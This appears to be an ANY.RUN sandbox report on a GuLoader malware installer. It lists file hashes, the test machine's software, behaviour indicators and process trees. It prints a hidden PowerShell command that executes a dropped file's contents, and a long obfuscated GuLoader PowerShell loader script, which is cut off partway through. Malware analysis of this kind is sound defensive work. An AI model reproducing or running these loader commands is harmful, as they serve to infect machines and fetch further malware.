Malware analysis d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe Malicious activity

Add for printing

File name:	d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe
Full analysis:	https://app.any.run/tasks/f6b46917-d985-422b-8d30-f04885e75d00
Verdict:	Malicious activity
Threats:	GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. GuLoader ist ein fortschrittlicher, in Shellcode geschriebener Downloader. Er wird von Kriminellen verwendet, um andere Malware, vor allem Trojaner, in großem Umfang zu verbreiten. Er ist dafür berüchtigt, dass er Anti-Erkennungs- und Anti-Analyse-Funktionen nutzt. Malware Trends Tracker >>>
Analysis date:	February 06, 2024, 10:02:08
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	guloader
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5:	B7691CF91035B792E916E328F197D1F3
SHA1:	858AC0E3789DED8BA64846BF1D308D98AE85C449
SHA256:	D6C76AC7C95BF8B4A7E162DAB180A6387DF27B0644AD1DB2BFF9B578181ADA37
SSDEEP:	24576:kMm/8Q9egG9Di44VEEF2b/y1cOO2Eh5fdq/sB4wtGu85jF7u+PXf2O6ZQ2/t+s5j:5m/8Q9egG9Di44VEEF2b/y1cOO2Eh5f3

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (109.0.5414.120)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft .NET Framework 4.8 (4.8.03761)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.177.11)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (64-bit x64) (7.5.1)
PowerShell 7-x64 (7.2.11.0)
Skype version 8.100 (8.100)
Update for Microsoft .NET Framework 4.8 (KB4503575) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Run PowerShell with an invisible window
  - powershell.exe (PID: 308)
- Detected an obfuscated command line used with Guloader
  - powershell.exe (PID: 2708)
SUSPICIOUS
- Starts POWERSHELL.EXE for commands execution
  - d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe (PID: 2000)
  - powershell.exe (PID: 308)
- Reads binary file using Get-Content
  - powershell.exe (PID: 308)
- Application launched itself
  - powershell.exe (PID: 308)
- Base64-obfuscated command line is found
  - powershell.exe (PID: 308)
- Reads the Internet Settings
  - wab.exe (PID: 1648)
- Connects to the server without a host name
  - wab.exe (PID: 1648)
INFO
- Creates files or folders in the user directory
  - d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe (PID: 2000)
- Reads the computer name
  - d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe (PID: 2000)
  - wab.exe (PID: 1648)
- Checks supported languages
  - d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe (PID: 2000)
  - wab.exe (PID: 1648)
- Create files in a temporary directory
  - d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe (PID: 2000)
- Creates or changes the value of an item property via Powershell
  - powershell.exe (PID: 308)
- Checks proxy server information
  - wab.exe (PID: 1648)
- Reads the machine GUID from the registry
  - wab.exe (PID: 1648)
- Manual execution by a user
  - odbcconf.exe (PID: 2124)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win32 Executable MS Visual C++ (generic) (42.2)
.exe	\|	Win64 Executable (generic) (37.3)
.dll	\|	Win32 Dynamic Link Library (generic) (8.8)
.exe	\|	Win32 Executable (generic) (6)
.exe	\|	Generic Win/DOS Executable (2.7)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2019:12:16 01:50:50+01:00
ImageFileCharacteristics:	No relocs, Executable, No line numbers, No symbols, 32-bit
PEType:	PE32
LinkerVersion:	6
CodeSize:	25088
InitializedDataSize:	118784
UninitializedDataSize:	1024
EntryPoint:	0x3384
OSVersion:	4
ImageVersion:	6
SubsystemVersion:	4
Subsystem:	Windows GUI

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

308

powershell.exe -windowstyle hidden $tools7 = Get-Content 'C:\Users\admin\AppData\Roaming\byplanlgningsudvalget\dngendes\Afterlifes\Forledelse\Desmerdyrenes.Soe' ; powershell.exe "$tools7"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

—

d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.14409.1005 (rs1_srvoob.161208-1155)

Modules

Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

1648

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Program Files (x86)\windows mail\wab.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Contacts

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\syswow64\certmgr.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll

2000

"C:\Users\admin\AppData\Local\Temp\d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe"

C:\Users\admin\AppData\Local\Temp\d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe

—

explorer.exe

User:

admin

Integrity Level:

MEDIUM

Exit code:

Modules

Images
c:\users\admin\appdata\local\temp\d6c76ac7c95bf8b4a7e162dab180a6387df27b0644ad1db2bff9b578181ada37.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2124

"C:\Windows\SysWOW64\odbcconf.exe"

C:\Windows\SysWOW64\odbcconf.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

ODBC Driver Configuration Program

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\odbcconf.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2708

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Lspes Supersulphurise Overteaching Taleundervisningerne Miriness #><#Pseudoacademical Eliasite Univerbal #>$Peronosporales = """Ko;ArFFiuPinMacLitHeiDooVanTa CoAmiaEmrSlgBaaRenUngCas UvSeiAnnafe SsKo4De Ca{Ve An Sk An BpPeaChrAcaTjmDe(Br[AtSInt Wr Fi MnSkg O]Ne`$abHDieCitbie ArTyoIndtroFanFltSuo ki BdNg) J;An Fr`$AnSChksaoWevCobMauTrnVadJasKop Sl uaAfnSytPae Hr B te=Sm Ud`$DaHunePytFoeAnrNyododSyoSanMet DoOviFodEk.MiL KeGynNag StDehSu;Sp Pr Ae F By`$HoPSllTiu MrAfiPapFooDitIneTen OcGee D us=Su CNUneSpwtr-MiOHubObjIneStcFitLo UrbInyTht Be K[Gh]Ud Mu(Di`$ ASSmkAnoZovCebGau AnPadHasDrpTol Sa BnChtSaeHjrSm It/be Ne2Un)Mb;An Sp`$KoFCorZii BtKossktGuiNelRe=Me'AnSYaU R'Tr+ S'GaBIsSTeTLuRSpIflNInGSt'Ph; l He sp No SF DoUdr L( I`$baLImuMonFreOpfLyuDilAcdobePrsFr=Un0Ba;Sp Si`$FoLThuBrnBae DfCruMdlBrd FeTrsBo Ha- BlTat B Ta`$StS Sk RoFlvPrbCeu En Tdtes EpOplatasenTht PeSyrDy; L Fo`$suLSeuAnnWieCafFeuDalUld TeMisFo+In= C2Jo)no{Ta Gr Mo Su In Ca O Su N`$ KPEnlOvuDer MiKopBroUntDreLan TcVaeSt[Me`$DrLTiuAfn Pe Mf KuPrlBrd AespsFj/Kr2De]Me jo=Pl Fo[Dic PoUnn JvVee IrhatMa]Re:Hy:PlTDuoStBpayHvtreeKg(De`$OvHBoeSttHoeSirUdoIsdIsoSenGttReo SiKlden.Ce`$CaFRerOmiBatOns RtPliMolOv.IlISmnTuvProRrkDie S(Hy`$hoL luChnReeAgfAnuStlDidKoeDesSk,In Co2 S)Ra, V Di1 D6Ba)Vi;Hu Sl Fe`$OvPYvlpeuHorDiiBrpCeobotPleNanRacBeeFu[Ve`$PeLUnu Dn MeMaf NuSvlOvdTeeBis D/at2Ca]St fl=To SkxOuoQur Sa Tm Fi T Am`$ BPunlOcuAnrshi mpchoHet EeAnnnicAne A[Lv`$TaL AuEmnReeUnfVauHyl RdFoe tsDe/ A2Ly] A P2Fi4Dr6Ta;Te f C St P}Fa Un[OmSAftRarskiThnVagFl]Ba[UnSCeyPasDet SeOvm N.LoT SeArxTitUd.OmEDunCucMao Od DiDen Ggdy]sc:Br:IaARiSUnCBeIOvILo.DaG TeMatReSMatSrrPriMenKogSl( P`$KrP Pl suKrrRii Ip SoEmtDeeUlnKucPae A)Do;su}Bo`$ vE ogDynStsSup LlSta Bn UsOu0De= CAFaaMirPlgReaKunMugFrsFov OiAnnAde KsOp4Al sl'GlA A5Gr8MeF S8Be5Wo8Tr2Di9Vi3ri9TrBFaDSt8 S9Bo2 R9brAsc9DeAPa' D;Fl`$SyEovgPanRes SpDolgaarenMesVe1Zy=DiADea VrSpgPaaSknCogImsDev BiNonSteLisPl4Bl En'OnBInB E9KaFNe9Du5Ov8 A4Fy9Le9Di8Wh5Sv9In9Ud9 U0Li8Bi2BeDFr8 GADe1Ka9 UFPl9Sl8 CCIn5CoCSl4 tDUn8elAsv3Fo9br8ra8 R5Pa9Um7Ta9Of0Be9Ph3 BB T8 D9ba7Ha8St2St9NoFNo8Un0mu9Li3MeBFlBBy9St3An8De2Tr9MgETa9St9Ug9Am2co8Ph5Me'wa;Ga`$SuE PgFonResunpGelOraTrnErsSk2Gl=GaAKnaRirFrgltaSenBrgDusDuv Bi BnEne fsBe4Gr Ef'auBSm1Sk9 p3Va8Ve2MuAPe6 A8Ka4Ja9Pi9Pl9Da5BlBMo7Ud9Nd2Fa9Au2Ep8Me4Af9 I3De8Sk5Pe8Cr5Ly'er;Ps`$ToEDag InMeslspRelHoa ZnTrs L3 t= RAbaa Or Dg ka TnUngBisFlv HiJon He Ts O4Re Fi'SeA A5Re8soFHa8Sa5vi8Ta2Br9Su3Ch9GoBMuDLa8 FASl4Ce8Re3 C9Tm8 K8ke2 D9BaFfl9MaBNe9To3AlDGr8QuB CF L9 S8He8Le2Su9He3fe8Br4Ap9Kl9Sa8En6TrAop5Be9 L3be8 K4ar8 L0Fa9GaFPa9Be5Re9 U3Be8st5SaDEx8SpB DE K9Yd7Dr9An8 I9 t2Jo9TiAis9 H3 MAAn4Sl9Pr3Ba9 U0 K'He;Un`$ TEAngnenGysUtpHalHjaDinNosTy4fl=PlAStaVirHigBuaDdnPeg es LvSoiLan Ae UsFo4 T F'Sv8Es5 K8Ns2 K8 Y4Ld9 TFSt9Sa8 P9Ta1An' V;ke`$KnESagCenIhs SpTrlBya SnPhsJo5Co=DeAWhaEprImgBlaPrnReg MsArvVeiAfnSoevas H4Sk Dr'ElB S1 G9Sl3Co8Tr2 eB CBUn9 N9Op9Fo2Dy8Ka3Ny9waA S9Yn3AfBFoEra9Ud7St9Be8St9Es2 S9JaACa9 E3Du' A;Mr`$CiESigFjnOpsHjpVel JaSpnVesFl6Ac=EfAJuasmr AgHea Lnswg Es MvNoiFon AeInsBu4Ou or'EfA A4InASt2LiA I5ma8Ve6Ti9Re3Ba9du5 W9SnF Z9Fa7Re9DrA RB R8He9 K7Sp9UbBLi9 U3BeD VAHyDTj6UdBStEIn9 MF r9 N2Ca9Re3GeBAn4ki8FaFSaASi5Ar9StFMi9Un1SeDFoA BDDe6CrARe6 J8 C3Un9Ac4 W9 UAUn9AtFSy9Af5Ne'ma;Af`$PiEDigOpnBrsGupAmlOva UnDrsRs7Fl=KoATeaGerFugInaFyngagXes TvskiSinGleBlsRe4So Li' AASp4Sa8Re3Tr9 U8Ma8Ca2Fo9EnF K9AnBRe9Va3IdDReA AD K6 FBSpBWo9Se7 A9 M8Tu9Ga7 A9Tr1fr9Wa3Th9Un2cl' O;Pr`$StEBlg DnElstrpRelBoaVonHasIw8 P=UdAexaInrBeg MarvnargPpsTuv Fi Hn SeOusTr4tr S' RADe4Al9 C3 H9sl0Li9PaATh9Ya3 V9Ny5sp8Al2 B9Pr3si9bl2 VBDi2Su9 B3sl9SkADa9In3To9la1Al9An7 L8De2Co9Ne3Hu'Ep; L`$ PESugFlnTosSipKelCaaConHrsTa9pi=AaAFra MrJegTea HnDeg PsTev CiRenApeBis M4ca Go'KnBSpFLa9Ac8KrBFyBom9 C3Uf9ViBSj9Fi9Pr8De4Af8JuFArBMeBTj9se9Mi9Ko2ni8Be3Cu9EeATh9 M3 G'Go; a`$ UIPrnPedPebMia RgSye Bs P0Xe=SnA daGrrOugKuaRunKngNasThvFriTynRoe UsSt4St Ru'ReBPoBNo8EnFTrBLi2Bo9Co3Re9PhAAk9 r3Pr9Yd1 B9Is7Ge8Ha2me9Cr3PrATi2Ny8ReFIc8 T6 K9Id3in'Di;Et`$ IINonPrdLib JaspgUnePas C1Gn=SuAOvaGerCugPaaLen TgGrsBev FiRenGreKmsGo4Pa Tr'GlBUl5An9SkADi9Li7Fe8Sp5 D8Ch5UdDKiAExDZo6RaALa6he8 A3Va9Ex4Ph9MiAIn9SrFKe9Ti5SkDWaA BDGn6DrAGr5 O9Pr3Co9 K7Di9SeA S9In3Lo9Re2TiDMuAUdDSe6NoBPe7ze9 D8Cy8Am5Un9SpFBeBAl5No9FrARi9Fr7St8Ru5Su8Fo5MeDStAEnDWi6 uB O7St8No3Fo8Mo2pe9ga9 LBSk5Ep9PrATi9Se7 G8Fo5St8Br5 O'Ou; C`$TeI Fn EdvabCeaTrgTreTasMa2Yn= MAsea CrDegAba BnTrg 